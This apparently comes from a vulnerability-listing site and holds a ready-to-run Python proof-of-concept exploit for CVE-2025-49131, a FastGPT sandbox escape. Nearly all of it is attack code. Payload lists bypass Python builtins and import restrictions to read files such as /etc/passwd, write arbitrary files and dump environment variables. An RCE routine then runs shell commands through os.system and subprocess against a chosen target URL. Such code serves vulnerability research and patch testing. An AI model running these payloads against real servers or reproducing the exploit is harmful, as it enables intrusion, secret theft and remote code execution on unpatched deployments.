4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2025-49131 - FastGPT Sandbox Escape Proof of Concept
========================================================
Vulnerability: Sandbox Escape via insufficient isolation
Affected: FastGPT fastgpt-sandbox < 4.9.11
CVSS: 6.3 (Medium)
Impact: Read/Write arbitrary files, bypass Python import restrictions

Author: Security Research
Date: 2025-12-30
"""

import argparse
import requests
import json
import base64
import sys
from typing import Optional, Dict, Any

# Colors for output
class Colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    RESET = '\033[0m'
    BOLD = '\033[1m'

def banner():
    print(f"""{Colors.RED}
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
{Colors.YELLOW}
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
{Colors.GREEN}
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
{Colors.CYAN}╔═══════════════════════════════════════════════════════════╗
║              CVE-2025-49131 | CVSS 6.3 (Medium)           ║
║            FastGPT Sandbox Container Escape                ║
║                 Affected: < v4.9.11                        ║
║   Impact: File R/W, Import Bypass, Remote Code Execution   ║
╚═══════════════════════════════════════════════════════════╝{Colors.RESET}
""")


class FastGPTSandboxExploit:
    """FastGPT Sandbox Escape Exploit Class"""
    
    def __init__(self, target: str, verbose: bool = False):
        self.target = target.rstrip('/')
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })
    
    def log(self, msg: str, level: str = 'info'):
        """Log messages with color"""
        colors = {
            'info': Colors.BLUE,
            'success': Colors.GREEN,
            'error': Colors.RED,
            'warning': Colors.YELLOW
        }
        if self.verbose or level in ['success', 'error']:
            print(f"{colors.get(level, Colors.RESET)}[{level.upper()}]{Colors.RESET} {msg}")
    
    def check_target(self) -> bool:
        """Check if target is reachable"""
        try:
            resp = self.session.get(f"{self.target}/health", timeout=10)
            return resp.status_code == 200
        except Exception as e:
            self.log(f"Target unreachable: {e}", 'error')
            return False
    
    def detect_vulnerability(self) -> Dict[str, Any]:
        """Non-destructive vulnerability detection"""
        self.log("Checking for CVE-2025-49131 vulnerability...", 'info')
        
        # Detection payload - tries to access __builtins__
        detection_payloads = [
            {
                "code": "str(type(__builtins__))",
                "description": "Builtins access check"
            },
            {
                "code": "str(dir())",
                "description": "Global namespace check"
            }
        ]
        
        results = {
            "vulnerable": False,
            "version": "unknown",
            "details": []
        }
        
        for payload in detection_payloads:
            try:
                result = self.execute_code(payload["code"])
                if result and "error" not in result.lower():
                    results["details"].append({
                        "test": payload["description"],
                        "result": "passed",
                        "output": result[:100]
                    })
                    results["vulnerable"] = True
            except Exception as e:
                results["details"].append({
                    "test": payload["description"],
                    "result": "blocked",
                    "error": str(e)
                })
        
        return results
    
    def execute_code(self, code: str) -> Optional[str]:
        """Execute code in the sandbox"""
        payload = {
            "code": code,
            "variables": {}
        }
        
        try:
            resp = self.session.post(
                f"{self.target}/api/sandbox/run",
                json=payload,
                timeout=30
            )
            
            if resp.status_code == 200:
                data = resp.json()
                return data.get("result", data.get("output", str(data)))
            else:
                self.log(f"Request failed: {resp.status_code}", 'error')
                return None
        except Exception as e:
            self.log(f"Execution error: {e}", 'error')
            return None
    
    def read_file(self, filepath: str) -> Optional[str]:
        """
        Read arbitrary file via sandbox escape
        Uses multiple bypass techniques
        """
        self.log(f"Attempting to read: {filepath}", 'info')
        
        # Multiple file read payloads
        payloads = [
            # Direct open
            f"open('{filepath}', 'r').read()",
            
            # Builtins bypass
            f"__builtins__.open('{filepath}').read()",
            
            # Lambda wrapper
            f"(lambda: open('{filepath}').read())()",
            
            # Getattr bypass
            f"getattr(__builtins__, 'open')('{filepath}').read()",
            
            # Code object manipulation
            f"exec('result=open(\"{filepath}\").read()') or result",
        ]
        
        for i, payload in enumerate(payloads, 1):
            self.log(f"Trying payload {i}/{len(payloads)}...", 'info')
            try:
                result = self.execute_code(payload)
                if result and "error" not in result.lower() and "traceback" not in result.lower():
                    self.log(f"Success with payload {i}!", 'success')
                    return result
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
        
        self.log("All file read payloads failed", 'error')
        return None
    
    def write_file(self, filepath: str, content: str) -> bool:
        """
        Write arbitrary file via sandbox escape
        """
        self.log(f"Attempting to write to: {filepath}", 'info')
        
        # Escape content for Python string
        escaped_content = content.replace('\\', '\\\\').replace("'", "\\'")
        
        payloads = [
            f"open('{filepath}', 'w').write('{escaped_content}')",
            f"__builtins__.open('{filepath}', 'w').write('{escaped_content}')",
        ]
        
        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result:
                    self.log(f"File write successful!", 'success')
                    return True
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
        
        self.log("All file write payloads failed", 'error')
        return False
    
    def import_bypass(self, module: str) -> Optional[str]:
        """
        Bypass import restrictions
        """
        self.log(f"Attempting to import: {module}", 'info')
        
        payloads = [
            # Direct import
            f"__import__('{module}')",
            
            # Builtins import
            f"__builtins__.__import__('{module}')",
            
            # Importlib
            f"__import__('importlib').import_module('{module}')",
            
            # Exec import
            f"exec('import {module}')",
            
            # Dict access
            f"__builtins__.__dict__['__import__']('{module}')",
        ]
        
        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result and "error" not in result.lower():
                    self.log(f"Import bypass successful with payload {i}!", 'success')
                    return result
            except Exception as e:
                continue
        
        self.log("All import bypass payloads failed", 'error')
        return None
    
    def get_env(self) -> Optional[Dict]:
        """Get environment variables"""
        self.log("Attempting to read environment variables...", 'info')
        
        payloads = [
            "__import__('os').environ.copy()",
            "dict(__import__('os').environ)",
        ]
        
        for payload in payloads:
            try:
                result = self.execute_code(payload)
                if result:
                    return result
            except:
                continue
        return None
    
    def rce_chain(self, command: str) -> Optional[str]:
        """
        Attempt full RCE via various chains
        """
        self.log(f"Attempting RCE chain with command: {command}", 'info')
        
        payloads = [
            # os.system
            f"__import__('os').system('{command}')",
            
            # os.popen
            f"__import__('os').popen('{command}').read()",
            
            # subprocess
            f"__import__('subprocess').check_output('{command}', shell=True).decode()",
            
            # subprocess with Popen
            f"__import__('subprocess').Popen('{command}', shell=True, stdout=-1).communicate()[0].decode()",
        ]
        
        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result:
                    self.log(f"RCE successful with method {i}!", 'success')
                    return result
            except Exception as e:
                self.log(f"RCE method {i} failed: {e}", 'warning')
                continue
        
        self.log("All RCE payloads failed", 'error')
        return None


def main():
    banner()
    
    parser = argparse.ArgumentParser(
        description='CVE-2025-49131 - FastGPT Sandbox Escape POC',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python poc.py --target http://localhost:3001 --detect
  python poc.py --target http://localhost:3001 --read /etc/passwd
  python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
  python poc.py --target http://localhost:3001 --import os
  python poc.py --target http://localhost:3001 --rce "id"
        """
    )
    
    parser.add_argument('--target', '-t', required=True, help='Target FastGPT sandbox URL')
    parser.add_argument('--detect', '-d', action='store_true', help='Detect vulnerability (non-destructive)')
    parser.add_argument('--read', '-r', help='File path to read')
    parser.add_argument('--write', '-w', help='File path to write')
    parser.add_argument('--content', '-c', default='CVE-2025-49131 POC', help='Content to write')
    parser.add_argument('--import', '-i', dest='import_module', help='Module to import')
    parser.add_argument('--env', '-e', action='store_true', help='Read environment variables')
    parser.add_argument('--rce', help='Command to execute (RCE)')
    parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
    parser.add_argument('--output', '-o', help='Output file for results')
    
    args = parser.parse_args()
    
    exploit = FastGPTSandboxExploit(args.target, args.verbose)
    
    results = {"target": args.target, "cve": "CVE-2025-49131", "actions": []}
    
    if args.detect:
        print(f"\n{Colors.CYAN}[*] Running vulnerability detection...{Colors.RESET}")
        detect_result = exploit.detect_vulnerability()
        results["detection"] = detect_result
        
        if detect_result["vulnerable"]:
            print(f"{Colors.GREEN}[+] TARGET IS VULNERABLE!{Colors.RESET}")
        else:
            print(f"{Colors.YELLOW}[-] Target may be patched or not vulnerable{Colors.RESET}")
        
        print(json.dumps(detect_result, indent=2))
    
    if args.read:
        print(f"\n{Colors.CYAN}[*] Reading file: {args.read}{Colors.RESET}")
        content = exploit.read_file(args.read)
        if content:
            print(f"{Colors.GREEN}[+] File content:{Colors.RESET}")
            print("-" * 50)
            print(content)
            print("-" * 50)
            results["actions"].append({"type": "read", "file": args.read, "success": True, "content": content[:500]})
        else:
            results["actions"].append({"type": "read", "file": args.read, "success": False})
    
    if args.write:
        print(f"\n{Colors.CYAN}[*] Writing to file: {args.write}{Colors.RESET}")
        success = exploit.write_file(args.write, args.content)
        results["actions"].append({"type": "write", "file": args.write, "success": success})
        if success:
            print(f"{Colors.GREEN}[+] File written successfully!{Colors.RESET}")
    
    if args.import_module:
        print(f"\n{Colors.CYAN}[*] Attempting import bypass: {args.import_module}{Colors.RESET}")
        result = exploit.import_bypass(args.import_module)
        results["actions"].append({"type": "import", "module": args.import_module, "success": bool(result)})
        if result:
            print(f"{Colors.GREEN}[+] Import bypass successful: {result}{Colors.RESET}")
    
    if args.env:
        print(f"\n{Colors.CYAN}[*] Reading environment variables...{Colors.RESET}")
        env = exploit.get_env()
        if env:
            print(f"{Colors.GREEN}[+] Environment:{Colors.RESET}")
            print(env)
            results["actions"].append({"type": "env", "success": True})
    
    if args.rce:
        print(f"\n{Colors.CYAN}[*] Attempting RCE: {args.rce}{Colors.RESET}")
        output = exploit.rce_chain(args.rce)
        if output:
            print(f"{Colors.GREEN}[+] Command output:{Colors.RESET}")
            print("-" * 50)
            print(output)
            print("-" * 50)
            results["actions"].append({"type": "rce", "command": args.rce, "success": True, "output": output})
        else:
            results["actions"].append({"type": "rce", "command": args.rce, "success": False})
    
    if args.output:
        with open(args.output, 'w') as f:
            json.dump(results, f, indent=2)
        print(f"\n{Colors.GREEN}[+] Results saved to: {args.output}{Colors.RESET}")
    
    print(f"\n{Colors.PURPLE}[*] Exploit completed.{Colors.RESET}")


if __name__ == "__main__":
    main()